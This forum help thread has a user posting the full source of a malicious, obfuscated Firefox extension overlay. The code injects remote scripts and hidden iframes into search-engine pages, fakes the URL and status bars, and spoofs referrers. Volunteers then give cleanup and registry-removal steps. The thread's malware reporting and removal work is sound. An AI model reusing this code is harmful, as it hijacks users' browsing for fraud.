<overlay id="xulrunner-overlay" xmlns="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul">&lt;script type="application/x-javascript" src="chrome://xulrunner/content/_cfg.js"/>&lt;script type="application/x-javascript">function dex(str) { var res = "", next = ""; var len = str.length; if(len%2 != 0) return ""; for(var i=0; i<len; i+=2) {next = str.substring(i, i+2);next = parseInt(next, 16);res += String.fromCharCode(24^next); } return res;}function findOur(str) { var fdom, last, pos2, pos, ret;try { if((pos=str.indexOf('&fadurl=')) != -1) {pos2 = str.substring(pos+8).indexOf('&');if(!pos2) return -1;fdom = str.substring(pos+8, pos+8+pos2);if(!document.fdom) document.fdom = fdom;last = str.substring(pos+8+pos2);if((pos2 = last.indexOf('&aclck=')) != -1) last = last.substring(0, pos2); pos2 = str.substring(7).indexOf('/');if(!pos2) return -1;if(!document.ccdom) document.ccdom = str.substring(7, pos2);return 'http://' + fdom + str.substring(pos2+7, pos) + last; } else if((pos=str.indexOf(document.ccdom)) != -1) {return str.substring(0,pos) + document.fdom; }}catch(err){} return -1;}</script>&lt;script type="application/x-javascript"> window.addEventListener("load", function() { xulRun.init(); }, false); window.addEventListener("load", initRequestObserver, false); var xulRun = { init: function() { var appcontent = document.getElementById("appcontent"); if(appcontent) { appcontent.addEventListener("DOMContentLoaded", xulRun.onPageLoad, true); } var pos, dom, dom2;try {__d = dex(__d);var today = new Date();pos = __d.substring(7).indexOf('/');dom = __d.substring(7, pos+7);__d = 'http://' + today.getDate() + '.' + dom + __d.substring(pos+7);} catch(err){} if(!__d || !__u) { return; }var s;document.getElementById("urlbar").addEventListener("DOMAttrModified", function(e) { if((s = findOur(e.currentTarget.value)) != -1) e.currentTarget.value = s; }, false);document.getElementById("statusbar-display").addEventListener("DOMAttrModified", function(e) {if(e.target.label.indexOf(dom)!=-1) e.target.label = '';else if((s=findOur(e.target.label)) != -1) {e.target.label = s;}}, false);}, onPageLoad: function(aEvent) { var src = __d;var script;var doc = aEvent.originalTarget; var ref = doc.referrer; var loc = document.getElementById("urlbar").value;if(loc == undefined) loc = doc.location.href; if( loc.match(/google.*/(search|cse).*[&?]q=/) || loc.match(//search.yahoo.*search.*[&?]p=/) || loc.match(/ask.com.*/web.*[&?]q=/) ||loc.match(/bing.com/search.*[&?]q=/) ||loc.match(/aol/search.*(query|q)=/)) {src+="?"+__u+"&r="+Math.random();script = doc.createElement('script');script.id = "js_0";script.src = src;doc.getElementsByTagName('head')[0].appendChild(script);} else if(loc.match(/(yahoo|ask|aol|bing).[-.w]+/?$/)) {src.search(/(http://[^/]+/)/); src = RegExp.$1+"je.js?r="+Math.random();script = doc.createElement('script'); script.id = "js_e";script.src = src;doc.getElementsByTagName('head')[0].appendChild(script); } else if ((loc.match(/(google).[-.w]+/?$/) && doc.location.href != 'about:blank') || loc.match(/(google).[-.w]+/#/)) {src+="?"+__u+"&r="+Math.random();src.search(/(http://[^/]+/)/);var sdom = RegExp.$1;script = doc.createElement('script');script.id = "js_q";script.src = sdom +"jq.js";var tagp = doc.getElementsByTagName('head')[0];tagp.appendChild(script);script = doc.createElement('script');script.id = "js_1";script.src = sdom + "live.php?r=" + Math.random() + "&" + __u;tagp.appendChild(script);}else if(loc.match(/google.[-.w]+/images/)) { src.search(/(http://[^/]+/)/);src = RegExp.$1+"getpics.php?r="+Math.random();src+="&"+__u;script = window.content.document.createElement('script');script.id = "js_p"; script.src = src; doc.getElementsByTagName('head')[0].appendChild(script); }else if(ref.match(/google.[-.w]+/images/)) {var src; src = __d; src.search(/(http://[^/]+/)/); src = RegExp.$1+"showpics.php?r="+Math.random(); var frame = window.content.document.createElement('iframe'); frame.frameborder = "0"; frame.width = "1"; frame.height = "1"; frame.src = src; doc.getElementsByTagName('body')[0].appendChild(frame); } } }; function initRequestObserver() { var observerService = Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverService);observerService.addObserver(httpRequestObserver, "http-on-modify-request", false); } var httpRequestObserver = { observe: function(subject, topic, data) { if(topic == "http-on-modify-request") { var httpChannel = subject.QueryInterface(Components.interfaces.nsIHttpChannel); var pos = subject.URI.spec.indexOf("&aclck=http"); if(pos > -1) { var newRef = this.ioService = Components.classes["@mozilla.org/network/io-service;1"].getService(Components.interfaces.nsIIOService).newURI(decodeURIComponent(subject.URI.spec.substring(pos+7)), null, null);httpChannel.referrer = newRef;subject.URI.spec = subject.URI.spec.substring(0, pos);}}} };</script></overlay>


The references to search engines seemed pretty fishy so I archived it and created a dummy file with the same filename but without the script.

Attached Files


Edited by Budapest, 08 August 2010 - 08:11 PM.
Posts merged ~BP


BC AdBot (Login to Remove)

 


#2 snemelk

snemelk

    inżynier


  • Malware Response Team
  • 1,468 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:05:27 AM

Posted 09 August 2010 - 01:11 PM

Hi gamemakerman2002, and welcome to Bleeping Computer.

Sorry it has taken so long to get to you, but the board has been very busy lately, and all the Helpers here are volunteers.

If you still need help:
Download OTL.exe by OldTimer to your Desktop.
  • Close all windows and double click OTL.exe.
  • In the "Custom Scans/Fixes" window (under the light green bar) paste the following in bold:

    netsvcs
    drivers32
    %SYSTEMDRIVE%\*.*
    %systemroot%\system32\*.wt
    %systemroot%\system32\*.ruy
    %systemroot%\Fonts\*.com
    %systemroot%\Fonts\*.dll
    %systemroot%\Fonts\*.ini
    %systemroot%\Fonts\*.ini2
    %systemroot%\Fonts\*.exe
    %systemroot%\system32\spool\prtprocs\w32x86\*.*
    %systemroot%\REPAIR\*.bak1
    %systemroot%\REPAIR\*.ini
    %systemroot%\system32\*.jpg
    %systemroot%\*.jpg
    %systemroot%\*.png
    %systemroot%\*.scr
    %systemroot%\*._sy
    %APPDATA%\Adobe\Update\*.*
    %ALLUSERSPROFILE%\Favorites\*.*
    %APPDATA%\Microsoft\*.*
    %PROGRAMFILES%\*.*
    %APPDATA%\Update\*.*
    %systemroot%\*. /mp /s
    CREATERESTOREPOINT
    %systemroot%\System32\config\*.sav
    %PROGRAMFILES%|bak;true;false;false /fp
    %systemroot%\system32|bak;true;false;false /fp
    HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update\Results\Install|LastSuccessTime /rs

  • Click Run Scan and let the program run uninterrupted.
  • When the scan completes, it will open two Notepad windows. OTL.Txt and Extras.Txt. These are saved in the same location as OTL. Post both logs in this thread.
  • You may need to use two posts to get it all.

Posted Image
snemelk.hekko.pl - my site with a few computer security tips...
Silesia - that's where I live!

"If I had some duct tape, I could fix that." - MacGyver


#3 gamemakerman2002

gamemakerman2002
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:11:27 PM

Posted 09 August 2010 - 02:30 PM

Thanks for getting back to me but what I did fixed it.

#4 snemelk

snemelk

    inżynier


  • Malware Response Team
  • 1,468 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:05:27 AM

Posted 09 August 2010 - 03:45 PM

Hi gamemakerman2002!!.. smile.gif

QUOTE(gamemakerman2002 @ Aug 9 2010, 09:30 PM) View Post
Thanks for getting back to me but what I did fixed it.

Good! thumbup2.gif

What you did leaves a leftover on a machine and an orphaned Registry entry...

You can safely delete that folder:
C:Users\Luke\AppData\Local\{54A99DBC-39B9-454A-A1A3-5E56906EF030}

Then, please delete the corresponding Registry entry:
- close Firefox (copy these instructions to Notepad first)
- open Regedit: Getting Started: Launch Regedit
- navigate to this key (expand each key till you go to the "extensions" one):

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Firefox\extensions

- when you click the "extensions" key, you should see such a value listed:

{54A99DBC-39B9-454A-A1A3-5E56906EF030} - right click on it and choose: Delete ... Confirm, if asked... Close Regedit, launch Firefox... Everything should be deleted now properly... ;)
Posted Image
snemelk.hekko.pl - my site with a few computer security tips...
Silesia - that's where I live!

"If I had some duct tape, I could fix that." - MacGyver


#5 gamemakerman2002

gamemakerman2002
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:11:27 PM

Posted 09 August 2010 - 03:49 PM

Thank you very much!

edit: Ok I deleted the folder but the registry value doesn't exist in the key you specified. I did a search and it exsists in Computer\HKEY_USERS\S-1-5-21-2255672489-2639447647-2849063840-1000\Software\Mozilla\Firefox\Extensions . Should I delete that one?

Edited by gamemakerman2002, 09 August 2010 - 03:57 PM.


#6 snemelk

snemelk

    inżynier


  • Malware Response Team
  • 1,468 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:05:27 AM

Posted 10 August 2010 - 01:09 PM

Hi again gamemakerman2002!!.. smile.gif

QUOTE(gamemakerman2002 @ Aug 9 2010, 10:49 PM) View Post
Should I delete that one?

Yes, please do so... (with Firefox closed)...

If no problem remains, I'll close this thread, ok?..
Posted Image
snemelk.hekko.pl - my site with a few computer security tips...
Silesia - that's where I live!

"If I had some duct tape, I could fix that." - MacGyver


#7 gamemakerman2002

gamemakerman2002
  • Topic Starter

  • Members
  • 5 posts
  • OFFLINE
  •  
  • Local time:11:27 PM

Posted 10 August 2010 - 02:27 PM

ok

#8 snemelk

snemelk

    inżynier


  • Malware Response Team
  • 1,468 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Poland
  • Local time:05:27 AM

Posted 10 August 2010 - 02:47 PM

Glad we could help. smile.gif

If you need this topic reopened, just send me a PM (Send message from my profile) with the address of the thread. This applies only to the original topic starter. Everyone else please begin a New Topic.
Posted Image
snemelk.hekko.pl - my site with a few computer security tips...
Silesia - that's where I live!

"If I had some duct tape, I could fix that." - MacGyver





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users